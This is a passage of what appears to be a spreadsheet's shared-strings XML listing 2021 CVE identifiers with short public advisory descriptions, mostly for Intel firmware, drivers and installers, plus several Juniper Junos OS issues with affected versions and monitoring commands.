    <t>Out-of-bounds write in firmware for some Intel(R) PROSet/Wireless WiFi in multiple operating systems and some Killer(TM) WiFi in Windows 10 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0076</t>
  </si>
  <si>
    <t>Improper Validation of Specified Index, Position, or Offset in Input in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0077</t>
  </si>
  <si>
    <t>Insecure inherited permissions in the installer for the Intel(R) VTune(TM) Profiler before version 2021.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0078</t>
  </si>
  <si>
    <t>Improper input validation in software for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi in Windows 10 may allow an unauthenticated user to potentially enable denial of service or information disclosure via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0079</t>
  </si>
  <si>
    <t>Improper input validation in software for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi in Windows 10 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0082</t>
  </si>
  <si>
    <t>Uncontrolled search path in software installer for Intel(R) PROSet/Wireless WiFi in Windows 10 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0083</t>
  </si>
  <si>
    <t>Improper input validation in some Intel(R) Optane(TM) PMem versions before versions 1.2.0.5446 or 2.2.0.1547 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0084</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) Ethernet Controllers X722 and 800 series Linux RMDA driver before version 1.3.19 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0086</t>
  </si>
  <si>
    <t>Observable response discrepancy in floating-point operations for some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0089</t>
  </si>
  <si>
    <t>Observable response discrepancy in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0090</t>
  </si>
  <si>
    <t>Uncontrolled search path element in Intel(R) DSA before version 20.11.50.9 may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0091</t>
  </si>
  <si>
    <t>Improper access control in the firmware for some Intel(R) Processors may allow an unauthenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0092</t>
  </si>
  <si>
    <t>Improper access control in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0093</t>
  </si>
  <si>
    <t>Incorrect default permissions in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0094</t>
  </si>
  <si>
    <t>Improper link resolution before file access in Intel(R) DSA before version 20.11.50.9 may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0095</t>
  </si>
  <si>
    <t>Improper initialization in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0096</t>
  </si>
  <si>
    <t>Improper authentication in the software installer for the Intel(R) NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN, NUC7i7DN before version 1.78.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0097</t>
  </si>
  <si>
    <t>Path traversal in the BMC firmware for Intel(R) Server Board M10JNP2SB before version EFI BIOS 7215, BMC 8100.01.08 may allow an unauthenticated user to potentially enable a denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0098</t>
  </si>
  <si>
    <t>Improper access control in the Intel Unite(R) Client for Windows before version 4.2.25031 may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0099</t>
  </si>
  <si>
    <t>Insufficient control flow management in the firmware for some Intel(R) Processors may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0100</t>
  </si>
  <si>
    <t>Incorrect default permissions in the installer for the Intel(R) SSD Data Center Tool, versions downloaded before 12/31/2020, may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0101</t>
  </si>
  <si>
    <t>Buffer overflow in the BMC firmware for Intel(R) Server BoardM10JNP2SB before version EFI BIOS 7215, BMC 8100.01.08 may allow an unauthenticated user to potentially enable an escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0102</t>
  </si>
  <si>
    <t>Insecure inherited permissions in the Intel Unite(R) Client for Windows before version 4.2.25031 may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0103</t>
  </si>
  <si>
    <t>Insufficient control flow management in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0104</t>
  </si>
  <si>
    <t>Uncontrolled search path element in the installer for the Intel(R) Rapid Storage Technology software, before versions 17.9.0.34, 18.0.0.640 and 18.1.0.24, may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0105</t>
  </si>
  <si>
    <t>Insecure inherited permissions in some Intel(R) ProSet/Wireless WiFi drivers may allow an authenticated user to potentially enable information disclosure and denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2021-0106</t>
  </si>
  <si>
    <t>Incorrect default permissions in the Intel(R) Optane(TM) DC Persistent Memory for Windows software versions before 2.00.00.3842 or 1.00.00.3515 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0107</t>
  </si>
  <si>
    <t>Unchecked return value in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0108</t>
  </si>
  <si>
    <t>Uncontrolled search path in the Intel Unite(R) Client for Windows before version 4.2.25031 may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0109</t>
  </si>
  <si>
    <t>Insecure inherited permissions for the Intel(R) SOC driver package for STK1A32SC before version 604 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0110</t>
  </si>
  <si>
    <t>Improper access control in some Intel(R) Thunderbolt(TM) Windows DCH Drivers before version 1.41.1054.0 may allow unauthenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0111</t>
  </si>
  <si>
    <t>NULL pointer dereference in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0112</t>
  </si>
  <si>
    <t>Unquoted service path in the Intel Unite(R) Client for Windows before version 4.2.25031 may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0113</t>
  </si>
  <si>
    <t>Out of bounds write in the BMC firmware for Intel(R) Server Board M10JNP2SB before version EFI BIOS 7215, BMC 8100.01.08 may allow an unauthenticated user to potentially enable a denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0114</t>
  </si>
  <si>
    <t>Unchecked return value in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0115</t>
  </si>
  <si>
    <t>Buffer overflow in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0116</t>
  </si>
  <si>
    <t>Out-of-bounds write in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0117</t>
  </si>
  <si>
    <t>Pointer issues in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0118</t>
  </si>
  <si>
    <t>Out-of-bounds read in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0119</t>
  </si>
  <si>
    <t>Improper initialization in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-0120</t>
  </si>
  <si>
    <t>Improper initialization in the installer for some Intel(R) Graphics DCH Drivers for Windows 10 before version 27.20.100.9316 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0121</t>
  </si>
  <si>
    <t>Improper access control in the installer for some Intel(R) Iris(R) Xe MAX Dedicated Graphics Drivers for Windows 10 before version 27.20.100.9466 may allow authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0124</t>
  </si>
  <si>
    <t>Improper access control in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-0125</t>
  </si>
  <si>
    <t>CVE-2021-0126</t>
  </si>
  <si>
    <t>Improper input validation for the Intel(R) Manageability Commander before version 2.2 may allow an authenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0127</t>
  </si>
  <si>
    <t>Insufficient control flow management in some Intel(R) Processors may allow an authenticated user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0129</t>
  </si>
  <si>
    <t>Improper access control in BlueZ may allow an authenticated user to potentially enable information disclosure via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0131</t>
  </si>
  <si>
    <t>Use of cryptographically weak pseudo-random number generator (PRNG) in an API for the Intel(R) Security Library before version 3.3 may allow an authenticated user to potentially enable information disclosure via network access.</t>
  </si>
  <si>
    <t>CVE-2021-0132</t>
  </si>
  <si>
    <t>Missing release of resource after effective lifetime in an API for the Intel(R) Security Library before version 3.3 may allow a privileged user to potentially enable denial of service via network access.</t>
  </si>
  <si>
    <t>CVE-2021-0133</t>
  </si>
  <si>
    <t>Key exchange without entity authentication in the Intel(R) Security Library before version 3.3 may allow an authenticated user to potentially enable escalation of privilege via network access.</t>
  </si>
  <si>
    <t>CVE-2021-0134</t>
  </si>
  <si>
    <t>Improper input validation in an API for the Intel(R) Security Library before version 3.3 may allow a privileged user to potentially enable denial of service via network access.</t>
  </si>
  <si>
    <t>CVE-2021-0135</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) Ethernet Diagnostic Driver for Windows before version 1.4.0.10 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0143</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) Brand Verification Tool before version 11.0.0.1225 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0144</t>
  </si>
  <si>
    <t>Insecure default variable initialization for the Intel BSSA DFT feature may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0145</t>
  </si>
  <si>
    <t>Improper initialization of shared resources in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0146</t>
  </si>
  <si>
    <t>Hardware allows activation of test or debug logic at runtime for some Intel(R) processors which may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-0147</t>
  </si>
  <si>
    <t>Improper locking in the Power Management Controller (PMC) for some Intel Chipset firmware before versions pmc_fw_lbg_c1-21ww02a and pmc_fw_lbg_b0-21ww02a may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0148</t>
  </si>
  <si>
    <t>Insertion of information into log file in firmware for some Intel(R) SSD DC may allow a privileged user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0151</t>
  </si>
  <si>
    <t>Improper access control in the installer for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products in Windows 10 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0152</t>
  </si>
  <si>
    <t>Improper verification of cryptographic signature in the installer for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products in Windows 10 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0153</t>
  </si>
  <si>
    <t>Out-of-bounds write in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0154</t>
  </si>
  <si>
    <t>Improper input validation in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0155</t>
  </si>
  <si>
    <t>Unchecked return value in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0156</t>
  </si>
  <si>
    <t>Improper input validation in the firmware for some Intel(R) Processors may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0157</t>
  </si>
  <si>
    <t>Insufficient control flow management in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0158</t>
  </si>
  <si>
    <t>Improper input validation in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0159</t>
  </si>
  <si>
    <t>Improper input validation in the BIOS authenticated code module for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0160</t>
  </si>
  <si>
    <t>Uncontrolled search path in some Intel(R) NUC Pro Chassis Element AverMedia Capture Card drivers before version 3.0.64.143 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0161</t>
  </si>
  <si>
    <t>Improper input validation in firmware for Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and Killer(TM) Wi-Fi in Windows 10 and 11 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0162</t>
  </si>
  <si>
    <t>Improper input validation in software for Intel(R) PROSet/Wireless Wi-Fi and Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0163</t>
  </si>
  <si>
    <t>Improper Validation of Consistency within input in software for Intel(R) PROSet/Wireless Wi-Fi and Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0164</t>
  </si>
  <si>
    <t>Improper access control in firmware for Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0165</t>
  </si>
  <si>
    <t>Improper input validation in firmware for Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0166</t>
  </si>
  <si>
    <t>Exposure of Sensitive Information to an Unauthorized Actor in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0167</t>
  </si>
  <si>
    <t>Improper access control in software for Intel(R) PROSet/Wireless Wi-Fi and Killer(TM) Wi-Fi in Windows 10 and 11 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0168</t>
  </si>
  <si>
    <t>Improper input validation in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0169</t>
  </si>
  <si>
    <t>Uncontrolled Search Path Element in software for Intel(R) PROSet/Wireless Wi-Fi in Windows 10 and 11 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0170</t>
  </si>
  <si>
    <t>Exposure of Sensitive Information to an Unauthorized Actor in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0171</t>
  </si>
  <si>
    <t>Improper access control in software for Intel(R) PROSet/Wireless Wi-Fi and Killer(TM) Wi-Fi in Windows 10 and 11 may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0172</t>
  </si>
  <si>
    <t>Improper input validation in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0173</t>
  </si>
  <si>
    <t>Improper Validation of Consistency within input in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow a unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0174</t>
  </si>
  <si>
    <t>Improper Use of Validation Framework in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow a unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0175</t>
  </si>
  <si>
    <t>Improper Validation of Specified Index, Position, or Offset in Input in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0176</t>
  </si>
  <si>
    <t>Improper input validation in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0177</t>
  </si>
  <si>
    <t>Improper Validation of Consistency within input in software for Intel(R) PROSet/Wireless Wi-Fi and Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0178</t>
  </si>
  <si>
    <t>Improper input validation in software for Intel(R) PROSet/Wireless Wi-Fi and Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0179</t>
  </si>
  <si>
    <t>Improper Use of Validation Framework in software for Intel(R) PROSet/Wireless Wi-Fi and Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0180</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption in the Intel(R) HAXM software before version 7.6.6 may allow an unauthenticated user to potentially enable privilege escalation via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0182</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption in the Intel(R) HAXM software before version 7.6.6 may allow an unauthenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0183</t>
  </si>
  <si>
    <t>Improper Validation of Specified Index, Position, or Offset in Input in software for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0185</t>
  </si>
  <si>
    <t>Improper input validation in the firmware for some Intel(R) Server Board M10JNP Family before version 7.216 may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0186</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) SGX SDK applications compiled for SGX2 enabled processors may allow a privileged user to potentially escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0188</t>
  </si>
  <si>
    <t>Return of pointer value outside of expected range in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0189</t>
  </si>
  <si>
    <t>Use of out-of-range pointer offset in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0190</t>
  </si>
  <si>
    <t>Uncaught exception in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0193</t>
  </si>
  <si>
    <t>Improper authentication in the Intel(R) In-Band Manageability software before version 2.13.0 may allow a privileged user to potentially enable escalation of privilege via network access.</t>
  </si>
  <si>
    <t>CVE-2021-0194</t>
  </si>
  <si>
    <t>Improper access control in the Intel(R) In-Band Manageability software before version 2.13.0 may allow a privileged user to potentially enable escalation of privilege via network access.</t>
  </si>
  <si>
    <t>CVE-2021-0196</t>
  </si>
  <si>
    <t>Improper access control in kernel mode driver for some Intel(R) NUC 9 Extreme Laptop Kits before version 2.2.0.20 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0197</t>
  </si>
  <si>
    <t>Protection mechanism failure in the firmware for the Intel(R) Ethernet Network Controller E810 before version 1.5.5.6 may allow a privileged user to enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0198</t>
  </si>
  <si>
    <t>Improper access control in the firmware for the Intel(R) Ethernet Network Controller E810 before version 1.5.5.6 may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0199</t>
  </si>
  <si>
    <t>Improper input validation in the firmware for the Intel(R) Ethernet Network Controller E810 before version 1.6.0.6 may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0200</t>
  </si>
  <si>
    <t>Out-of-bounds write in the firmware for Intel(R) Ethernet 700 Series Controllers before version 8.2 may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0202</t>
  </si>
  <si>
    <t>On Juniper Networks MX Series and EX9200 Series platforms with Trio-based MPC (Modular Port Concentrator) where Integrated Routing and Bridging (IRB) interface is configured and it is mapped to a VPLS instance or a Bridge-Domain, certain network events at Customer Edge (CE) device may cause memory leak in the MPC which can cause an out of memory and MPC restarts. When this issue occurs, there will be temporary traffic interruption until the MPC is restored. An administrator can use the following CLI command to monitor the status of memory usage level of the MPC: user@device&gt; show system resource-monitor fpc FPC Resource Usage Summary Free Heap Mem Watermark : 20 % Free NH Mem Watermark : 20 % Free Filter Mem Watermark : 20 % * - Watermark reached Slot # % Heap Free RTT Average RTT 1 87 PFE # % ENCAP mem Free % NH mem Free % FW mem Free 0 NA 88 99 1 NA 89 99 When the issue is occurring, the value of “% NH mem Free” will go down until the MPC restarts. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). Please refer to https://kb.juniper.net/KB25385 for the list of Trio-based PFEs. This issue affects Juniper Networks Junos OS on MX Series, EX9200 Series: 17.3R3-S8; 17.4R3-S2; 18.2R3-S4, 18.2R3-S5; 18.3R3-S2, 18.3R3-S3; 18.4 versions starting from 18.4R3-S1 and later versions prior to 18.4R3-S6; 19.2 versions starting from 19.2R2 and later versions prior to 19.2R3-S1; 19.4 versions starting from 19.4R2 and later versions prior to 19.4R2-S3, 19.4R3; 20.2 versions starting from 20.2R1 and later versions prior to 20.2R1-S3, 20.2R2. This issue does not affect Juniper Networks Junos OS: 18.1, 19.1, 19.3, 20.1.</t>
  </si>
  <si>
    <t>CVE-2021-0203</t>
  </si>
  <si>
    <t>On Juniper Networks EX and QFX5K Series platforms configured with Redundant Trunk Group (RTG), Storm Control profile applied on the RTG interface might not take affect when it reaches the threshold condition. Storm Control enables the device to monitor traffic levels and to drop broadcast, multicast, and unknown unicast packets when a specified traffic level is exceeded, thus preventing packets from proliferating and degrading the LAN. Note: this issue does not affect EX2200, EX3300, EX4200, and EX9200 Series. This issue affects Juniper Networks Junos OS on EX Series and QFX5K Series: 15.1 versions prior to 15.1R7-S7; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S3; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2.</t>
  </si>
  <si>
    <t>CVE-2021-0204</t>
  </si>
  <si>
    <t>A sensitive information disclosure vulnerability in delta-export configuration utility (dexp) of Juniper Networks Junos OS may allow a locally authenticated shell user the ability to create and read database files generated by the dexp utility, including password hashes of local users. Since dexp is shipped with setuid permissions enabled and is owned by the root user, this vulnerability may allow a local privileged user the ability to run dexp with root privileges and access sensitive information in the dexp database. This issue affects Juniper Networks Junos OS: 15.1 versions prior to 15.1R7-S8; 15.1X49 versions prior to 15.1X49-D230; 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D34; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S7, 18.4R3-S6; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3-S1; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3-S1; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S2, 20.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0205</t>
  </si>
  <si>
    <t>When the "Intrusion Detection Service" (IDS) feature is configured on Juniper Networks MX series with a dynamic firewall filter using IPv6 source or destination prefix, it may incorrectly match the prefix as /32, causing the filter to block unexpected traffic. This issue affects only IPv6 prefixes when used as source and destination. This issue affects MX Series devices using MS-MPC, MS-MIC or MS-SPC3 service cards with IDS service configured. This issue affects: Juniper Networks Junos OS 17.3 versions prior to 17.3R3-S10 on MX Series; 17.4 versions prior to 17.4R3-S3 on MX Series; 18.1 versions prior to 18.1R3-S11 on MX Series; 18.2 versions prior to 18.2R3-S6 on MX Series; 18.3 versions prior to 18.3R3-S4 on MX Series; 18.4 versions prior to 18.4R3-S6 on MX Series; 19.1 versions prior to 19.1R2-S2, 19.1R3-S3 on MX Series; 19.2 versions prior to 19.2R3-S1 on MX Series; 19.3 versions prior to 19.3R2-S5, 19.3R3-S1 on MX Series; 19.4 versions prior to 19.4R3 on MX Series; 20.1 versions prior to 20.1R2 on MX Series; 20.2 versions prior to 20.2R2 on MX Series;</t>
  </si>
  <si>
    <t>CVE-2021-0206</t>
  </si>
  <si>
    <t>A NULL Pointer Dereference vulnerability in Juniper Networks Junos OS allows an attacker to send a specific packet causing the packet forwarding engine (PFE) to crash and restart, resulting in a Denial of Service (DoS). By continuously sending these specific packets, an attacker can repeatedly disable the PFE causing a sustained Denial of Service (DoS). This issue only affects Juniper Networks NFX Series, SRX Series platforms when SSL Proxy is configured. This issue affects Juniper Networks Junos OS on NFX Series and SRX Series: 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R3-S1; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S2, 19.2R2; 19.3 versions prior to 19.3R2. This issue does not affect Juniper Networks Junos OS versions on NFX Series and SRX Series prior to 18.3R1.</t>
  </si>
  <si>
    <t>CVE-2021-0207</t>
  </si>
  <si>
    <t>An improper interpretation conflict of certain data between certain software components within the Juniper Networks Junos OS devices does not allow certain traffic to pass through the device upon receipt from an ingress interface filtering certain specific types of traffic which is then being redirected to an egress interface on a different VLAN. This causes a Denial of Service (DoS) to those clients sending these particular types of traffic. Such traffic being sent by a client may appear genuine, but is non-standard in nature and should be considered as potentially malicious, and can be targeted to the device, or destined through it for the issue to occur. This issues affects IPv4 and IPv6 traffic. An indicator of compromise may be found by checking log files. You may find that traffic on the input interface has 100% of traffic flowing into the device, yet the egress interface shows 0 pps leaving the device. For example: [show interfaces "interface" statistics detail] Output between two interfaces would reveal something similar to: Ingress, first interface: -------------------- Interface Link Input packets (pps) Output packets (pps) et-0/0/0 Up 9999999999 (9999) 1 (0) -------------------- Egress, second interface: -------------------- Interface Link Input packets (pps) Output 